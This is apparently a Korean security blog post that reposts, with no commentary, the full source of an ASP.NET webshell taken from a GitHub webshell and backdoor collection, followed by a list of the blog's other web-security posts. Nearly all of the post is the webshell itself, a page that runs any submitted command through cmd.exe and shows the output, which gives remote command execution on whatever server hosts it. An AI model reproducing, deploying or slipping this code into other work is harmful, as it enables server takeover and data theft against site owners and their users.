https://github.com/xl7dev/WebShell/blob/master/Aspx/awen%20asp.net%20webshell.aspx
GitHub - xl7dev/WebShell: Webshell && Backdoor Collection
Webshell && Backdoor Collection. Contribute to xl7dev/WebShell development by creating an account on GitHub.
github.com
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
'웹' 카테고리의 다른 글
| Jira 취약점 점검 참고 (0) | 2022.09.15 |
|---|---|
| HTTP Request Smuggling (펌) (0) | 2022.06.16 |
| SSRF (펌) (0) | 2022.06.14 |
| HTTP Request Smuggling (펌) (0) | 2022.06.14 |
| DOM 기반 XSS (펌) (0) | 2022.05.11 |
wtdsoul
